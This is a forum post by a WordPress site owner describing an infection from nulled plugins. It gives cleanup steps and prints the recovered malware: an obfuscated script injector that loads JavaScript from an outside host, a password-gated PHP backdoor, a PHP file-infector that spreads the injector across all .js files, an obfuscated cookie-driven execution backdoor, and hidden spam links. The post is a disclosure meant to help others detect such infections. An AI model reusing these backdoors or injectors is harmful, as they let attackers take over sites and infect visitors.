- Sep 8, 2019
- 365
- 191
- 43
Why do I post that?
Educational purpose. If anyone stumbles upon something similar to know how to deal with it in the best way possible.
Why did I get malware/hacked in the first place?
No one to blame but yourself. You decide what you are going to put on your web server and only you have the power to do so. Most likely poor hardening, configuration, outdated plugins/software, or malicious file uploaded directly by you.
Another good answer to this is:
Because hackers want to achieve something. From SEO to phishing/scam/steal data/just do harm/for fun because they can.
Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins. To be honest I normally scan the files before I upload them to the server but lately I was just too bold because I wasn't finding anything suspicious since I'm using only Babiato and uploaded them straight to the server. Even though Babiato has it's good reputation and members here always helped each other (also helped me many times) there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.
How to clean the hack?
1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server with the ground
6. Forbid it's access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server from the ground up
10. Hardening the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC
What exactly is that malware doing?
It has a php/js file that executes the malware. Normaly it's not a rootkit but just a normal malware that spreads across all folders that have www-data user access in the main public_html folder.
In my case, I think what installs the functions of the malware was masked as an .ico
then it shits all over your .JavaScript and .PHP also .JSON and tries to replicate a malicious code.
Here is an example of how it looks.
Redirection to:
The part that you have to GREP in JS/PHP:
Decoded it looks like this:
Check your Wordpress for files like wp-stream.php, wp-xmlrpc.php (there shouldn't be no wp-xmlrpc but only xmlrpc.php in the default wp install)
wp-stream.php content
Decoded it looks like this:
I also noticed this not long ago, they may be connected:
(This you can find in your home page when looking at the view page source)
lte_ content
randomstring.php
To the so called hackers:
Annoying I admit... you now force me to use docker for every single website installation and find other ways to protect myself.
To the people that got hacked:
Try to share what you got, how you think you got it, but don't insist and blame someone if you don't have the evidence. Sharing helps others protect against similar attacks and figuring out how they got hacked in the first place.
PS: I found the core of the code before it deleted itself (have my ways) but I am not publishing it because it can be used the other way around.
test edit because I have some error when editting
Educational purpose. If anyone stumbles upon something similar to know how to deal with it in the best way possible.
Why did I get malware/hacked in the first place?
No one to blame but yourself. You decide what you are going to put on your web server and only you have the power to do so. Most likely poor hardening, configuration, outdated plugins/software, or malicious file uploaded directly by you.
Another good answer to this is:
Because hackers want to achieve something. From SEO to phishing/scam/steal data/just do harm/for fun because they can.
Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins. To be honest I normally scan the files before I upload them to the server but lately I was just too bold because I wasn't finding anything suspicious since I'm using only Babiato and uploaded them straight to the server. Even though Babiato has it's good reputation and members here always helped each other (also helped me many times) there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.
How to clean the hack?
1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server with the ground
6. Forbid it's access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server from the ground up
10. Hardening the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC
What exactly is that malware doing?
It has a php/js file that executes the malware. Normaly it's not a rootkit but just a normal malware that spreads across all folders that have www-data user access in the main public_html folder.
In my case, I think what installs the functions of the malware was masked as an .ico
then it shits all over your .JavaScript and .PHP also .JSON and tries to replicate a malicious code.
Here is an example of how it looks.
Redirection to:
The part that you have to GREP in JS/PHP:
Code:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Decoded it looks like this:
JavaScript:
Element.prototype.appendAfter = function(element) {
element.parentNode.insertBefore(this, element.nextSibling);
}
, false;
(function() {
var elem = document.createElement(script);
elem.type = text/javascript elem.src = https://store.dontkinhooot.tw/stat.jselem.appendAfter(document.getElementsByTagName(script)[0]);
elem.appendAfter(document.getElementsByTagName(head)[0]);
document.getElementsByTagName(head)[0].appendChild(elem);
}
)();
Element.prototype.appendAfter = function(element) {
element.parentNode.insertBefore(this, element.nextSibling);
}
, false;
(function() {
var elem = document.createElement(script);
elem.type = text/javascript elem.src = https://store.dontkinhooot.tw/stat.jselem.appendAfter(document.getElementsByTagName(script)[0]);
elem.appendAfter(document.getElementsByTagName(head)[0]);
document.getElementsByTagName(head)[0].appendChild(elem);
}
)();
var isIE=!1,isEdge=!1;
Check your Wordpress for files like wp-stream.php, wp-xmlrpc.php (there shouldn't be no wp-xmlrpc but only xmlrpc.php in the default wp install)
wp-stream.php content
PHP:
<?php if(isset($_POST['lt']) && md5($_POST['lt']) == base64_decode("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}} ?>
Decoded it looks like this:
PHP:
if(isset($_POST['lt']) && md5($_POST['lt']) == 023258bbeb7ce955a690dca056be885d ) {$lt = ;file_put_contents('lte_',''.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}}
I also noticed this not long ago, they may be connected:
(This you can find in your home page when looking at the view page source)
HTML:
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">
<a style="font-size:18px;" href="https://downapkmod.com/" title="https://downapkmod.com/">https://downapkmod.com/</a>,
<a style="font-size:18px;" href="https://apkcop.com/" title="https://apkcop.com/">https://apkcop.com/</a>
</div>
lte_ content
Code:
<?php ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');
$files = array();
$b = "/../../../../../../../../";
$l = "/";
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
$display = Array ( 'php' );
$search = Array('.js');
$files_ar = array();
foreach(new RecursiveIteratorIterator($it) as $file)
{
if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
{
$q = strposa($file->getFilename(), $search);
if($q != ""){
array_push($files,$file->getPathname());
}
}
}
foreach($files as $onefile) {
make_work($onefile);
}
for ($i = 1; $i < 8; $i++) {
$l .= "../";
try {
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'].$l);
$display = Array ( 'php' );
$search = Array('.js');
$files_ar = array();
foreach(new RecursiveIteratorIterator($it) as $file)
{
if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
{
$q = strposa($file->getFilename(), $search);
if($q != ""){
array_push($files,$file->getPathname());
}
}
}
foreach($files as $onefile) {
make_work($onefile);
}
} catch (Exception $e) {
}
}
function strposa($haystack, $needle, $offset=0) {
if(!is_array($needle)) $needle = array($needle);
$stroke = "";
foreach($needle as $query) {
if(strpos($haystack, $query, $offset) !== false) { $stroke .= $query."|";}
}
return $stroke;
}
function make_work($f){
$g = file_get_contents($f);
if (strpos($g, '102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119') !== false) {
} else {
$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo $f."<br />";
}
}
randomstring.php
Code:
<?php
$vrtna = '90b_xpdt*l63k8#yancofsrgmuvH72451\'ei-';$umcear = Array();$umcear[] = $vrtna[27].$vrtna[8];$umcear[] = $vrtna[18].$vrtna[22].$vrtna[34].$vrtna[16].$vrtna[7].$vrtna[34].$vrtna[3].$vrtna[20].$vrtna[25].$vrtna[17].$vrtna[18].$vrtna[7].$vrtna[35].$vrtna[19].$vrtna[17];$umcear[] = $vrtna[29].$vrtna[10].$vrtna[18].$vrtna[32].$vrtna[10].$vrtna[31].$vrtna[2].$vrtna[34].$vrtna[36].$vrtna[1].$vrtna[10].$vrtna[31].$vrtna[18].$vrtna[36].$vrtna[30].$vrtna[31].$vrtna[11].$vrtna[29].$vrtna[36].$vrtna[13].$vrtna[13].$vrtna[18].$vrtna[30].$vrtna[36].$vrtna[30].$vrtna[0].$vrtna[11].$vrtna[30].$vrtna[1].$vrtna[29].$vrtna[20].$vrtna[29].$vrtna[29].$vrtna[13].$vrtna[28].$vrtna[10];$umcear[] = $vrtna[14];$umcear[] = $vrtna[18].$vrtna[19].$vrtna[25].$vrtna[17].$vrtna[7];$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[3].$vrtna[22].$vrtna[34].$vrtna[5].$vrtna[34].$vrtna[16].$vrtna[7];$umcear[] = $vrtna[34].$vrtna[4].$vrtna[5].$vrtna[9].$vrtna[19].$vrtna[6].$vrtna[34];$umcear[] = $vrtna[21].$vrtna[25].$vrtna[2].$vrtna[21].$vrtna[7].$vrtna[22];$umcear[] = $vrtna[16].$vrtna[22].$vrtna[22].$vrtna[16].$vrtna[15].$vrtna[3].$vrtna[24].$vrtna[34].$vrtna[22].$vrtna[23].$vrtna[34];$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[9].$vrtna[34].$vrtna[17];$umcear[] = $vrtna[5].$vrtna[16].$vrtna[18].$vrtna[12];foreach ($umcear[8]($_COOKIE, $_POST) as $mcysgb => $slevav){function ytmnrg($umcear, $mcysgb, $cbodj){return $umcear[7]($umcear[5]($mcysgb . $umcear[2], ($cbodj / $umcear[9]($mcysgb)) + 1), 0, $cbodj);}function etbln($umcear, $uvrzj){return @$umcear[10]($umcear[0], $uvrzj);}function jvjpux($umcear, $uvrzj){$mltsule = $umcear[4]($uvrzj) % 3;if (!$mltsule) {$kbjfl = $umcear[1]; $wtmzk = $kbjfl("", $uvrzj[1]($uvrzj[2]));$wtmzk();exit();}}$slevav = etbln($umcear, $slevav);jvjpux($umcear, $umcear[6]($umcear[3], $slevav ^ ytmnrg($umcear, $mcysgb, $umcear[9]($slevav))));}
To the so called hackers:
Annoying I admit... you now force me to use docker for every single website installation and find other ways to protect myself.
To the people that got hacked:
Try to share what you got, how you think you got it, but don't insist and blame someone if you don't have the evidence. Sharing helps others protect against similar attacks and figuring out how they got hacked in the first place.
PS: I found the core of the code before it deleted itself (have my ways) but I am not publishing it because it can be used the other way around.
test edit because I have some error when editting
Last edited: